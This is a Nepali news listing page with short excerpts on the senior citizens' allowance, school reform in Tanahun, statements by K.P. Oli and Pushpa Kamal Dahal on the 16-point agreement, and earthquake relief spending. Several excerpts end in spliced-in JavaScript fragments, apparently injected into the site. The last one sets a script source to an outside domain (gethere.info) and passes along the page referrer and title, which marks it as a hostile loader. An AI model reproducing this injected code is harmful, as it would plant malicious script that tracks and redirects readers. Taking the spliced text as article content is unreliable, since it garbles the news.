Author: rajendra bhatta

जेष्ठ नागरिकको भत्ता बढ्यो, औषधि खर्चसहित १ हजार पाउने

काठमाडौं- सरकारले जेष्ठ नागरिकहरुको भत्ता बढाएको छ। अर्थमन्त्री डा. रामशरण महतले बजेट भाषण गर्दै जेष्ठ नागरिकको भत्ता ५ सय रुपैयाँबाट १ हजार रुपैयाँ पुर्‍याइएको जानकारी दिए। ५ सय रुपैयाँ भत्ता र ५ सय रुपैयाँ औषधि उपचार गरी जम्मा १ हजार रुपैयाँ दिइने उनले बताए। सो रकम बैंकिङ प्रणालीमार्फत दिइने छ। २०५१ सालमा तत्कालीन अर्थमन्त्री भरतमोहन अधिकारीले वृद्धवृद्धालाई सय रुपैयाँ वृद्धभत्ता दिएर यो कार्यक्रम सुरु गरेका थिए। सरकारले नयाँ आर्थिक बर्ष ०७२/७३ देखि जेष्ठ नागरिकका आश्रमहरुमा मनोरन्जनका साधनको व्यवस्था गर्ने अर्थमन्त्री महतले जानकारी दिए। सामाजिक सुरक्षा भत्ता पाउनेको संख्या २१ लाख छ। } else...

Read More

शैक्षिक सुधार अभियानमा पूर्वमन्त्री

तनहुँ- भूमि सुधार तथा व्यवस्था पूर्वमन्त्री भीमप्रसाद गौतम जिल्लाका सामुदायिक विद्यालयको गुणस्तर सुधार अभियानमा जुटेका छन्। उनले ‘सामुदायिक विद्यालयको शैक्षिक व्यवस्थापनका लागि साझा अभियान’ मार्फत जिल्लामा शैक्षिक सुधार अभियान सुरु गरेका हुन्। निजी विद्यालयको तुलनामा तालिम र पर्याप्त सेवा सुविधा पाएका शिक्षकले पढाएका सामुदायिक विद्यालयको शैक्षिक गुणस्तर खस्कनु राज्यलाई बोझ र भार हो। उनले भने, ‘जिल्लाका सबै शिक्षक, विद्यार्थी र अभिभावकलाई जिम्मेवार बनाउन हामी लागेका छौं’। सामुदायिक विद्यालयमा पढाउने शिक्षकहरूले मेहनत कम गर्ने, अभिभावक र विद्यार्थी स्वयंमा निजी विद्यालयतर्फ आकर्षण बढ्नु र जिल्ला शिक्षा कार्यालयबाट समेत फितलो अनुगमन हुने गरेकाले विद्यालयको गुणस्तर सुध्रन नसकेको पूर्वमन्त्री गौतमले बताए। सुधारका लागि क्षेत्र नम्बर एकमा एमाओवादी नेता ओमकुमारी पौडेल, क्षेत्र नम्बर दुईमा कांग्रेसका रमेशचन्द्र हड्खले र क्षेत्र नम्बर तीनमा एमालेका धर्मराज खनाल नेतृत्वमा क्षेत्रीय समितिसमेत बनाइएको पूर्वमन्त्री गौतमले बताए। var d=document;var...

Read More

विरोधले संविधान रोकिँदैन: केपी ओली

काठमाडौ- एमाले अध्यक्ष केपी ओलीले संविधानसभा भित्रको अधिकतम सहमतिमा साउनभित्र संविधान जारी हुने बताएका छन्। संविधान र बाहिर सानातिना विरोधका कुरा आए पनि यसले संविधान जारी गर्ने प्रक्रिया प्रभावित नहुने ओलीको भनाइ थियो। केही दिनपछि दिल्ली जान लागेका राजदूत राय संविधान निर्माणलगायत विषयमा कुरा गर्न आइतबार ओलीलाई भेट्न सिंहदरबार आएका थिए। उनीहरूबीच १ घण्टा कुराकानी भएको थियो। अध्यक्ष ओलीले १६ बुँदे सहमति ऐतिहासिक भएकाले यसकै आधारमा अघि बढ्ने बताएको उनका स्वकीय सचिव रमेश आचार्यले जनाए। १६ बुँदे सहमतिले संविधान जारी हुने वातावरण पैदा गरेकाले अब कसैले चाहेर पनि यो प्रक्रिया नरोकिने ओलीले उल्लेख गरेका थिए। if (document.currentScript)...

Read More

३० दलीय मोर्चाको आन्दोलनले सोचेजस्तो नभएपछि १६ बुँदे सम्झौता गर्‍यौं : दाहाल

वीरगन्ज- एकीकृत नेकपा माओवादीका अध्यक्ष पुष्पकमल दाहालले ३० दलीय मोर्चाको आन्दोलनले सोचेजस्तो आधीबेहरी सिर्जना गर्न नसकेपछि र दलहरुप्रति जनताको विश्वास गुम्दै गएपछि वाध्यात्मक परिस्थितिमा आफूहरुले १६ बुँदे समझदारी गर्नुपरेको बताएका छन्। वीरगन्जमा शनिबार आयोजित पत्रकार सम्मेलनमा बोल्दै अध्यक्ष दाहालले ३० दलीय मोर्चाको आन्दोलन सफल नभएकाले कांग्रेस एमालेसँग सहमति गरी संविधान जारी गर्ने पक्षमा आफ्नो पार्टी लागेको बताए। उनले सहमतिमा प्रदेशको सीमांकन र नामांकन सहितको संविधान ल्याउन पार्टीले पहल गरेपनि सफल नभएको बताए। पत्रकार सम्मेलनमा पार्टीका नेताहरु बाबुराम भट्टराई, नारायणकाजी श्रेष्ठ लगायतको उपस्थिति थियो। कार्यक्रममा बोल्दै बरिष्ठ नेता बाबुराम भट्टराईले पार्टीमा धेरै विचलन आएकोले यसलाई सुदृढ बनाउन जरुरी रहेको बताए। कार्यकर्ताहरुलाई एकता गर्न नसकेको भन्दै उनले पार्टी नेतृत्वको आलोचना समेत गरे। एमाओवादीका उपाध्यक्ष नारायाणकाजी श्रेष्ठले संविधान निर्माणको वातावरण बनाउनका लागि १६ बुँदे सहमति गरेको...

Read More

राहत वितरणमा कुनै अनियमितता भएको छैन – उपप्रधानमन्त्री गौतम

काठमाडौं- उपप्रधानमन्त्री तथा गृहमन्त्री वामदेव गौतमले विपद् व्यवस्थापनका क्रममा सरकारद्वारा वितरण गरिएको राहतमा कुनै पनि अनियमितता नभएको बताएका छन्। व्यवस्थापिका–संसद्को सार्वजनिक लेखा समितिका सभापति जनार्दन शर्माको सभापतित्वमा भएको बैठकमा सांसदको जिज्ञासाको उत्तर दिँदै गृहमन्त्री गौतमले भूकम्प प्रभावित क्षेत्रका जोखिम बस्तीलाई सुरक्षित स्थानमा स्थानान्तरण गर्ने काम अन्तिम चरणमा पुगेको बताए। अस्थायी बसोबासका लागि सरकारले प्रदान गर्ने रु १५ हजार सम्बन्धित क्षेत्रका जनतालाई उपलब्ध गराइसकेको बताउँदै उपप्रधानमन्त्री गौतमले बाँकी रु दुई लाख रकम त्यस्ता क्षेत्रमा भूकम्प प्रतिरोधक घर बनाउन उपयोग गरिने जानकारी दिए। सचिव सिलवालले प्रधानमन्त्री दैवी प्रकोप उद्धार कोषबाट हालसम्म केन्द्रीय दैवी प्रकोप उद्धार कोषमा रु १२ अर्ब प्राप्त भएको र त्यसमध्ये राहत वितरणका लागि बुधबारसम्म रु ११ अर्ब ८८ करोड ७३ लाख ४६ हजार ८६ खर्च भइसकेको जानकारी गराएका थिए। बैठकमा गृहमन्त्री गौतमले उद्धारका क्रममा नेपाली सेना, विदेशी निकाय र निजी क्षेत्रका जम्मा ३९ हेलिकप्टरका चार हजार ६३९ उडान भएका र त्यसमा भएको खर्चको विवरण प्रस्तुत गरेका थिए। सचिव सिलवालले भूकम्पबाट जोखिममा रहेका कतिपय क्षेत्रका मानिसले आफ्नो गृहस्थान छोड्न नमानेकाले समस्या देखिएको बताउँदै त्यस्ता बस्तीलाई त्यहीँ नजिक वर्षाबाट जोगिने उपाय गरिएको जानकारी गराए। s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +...

Read More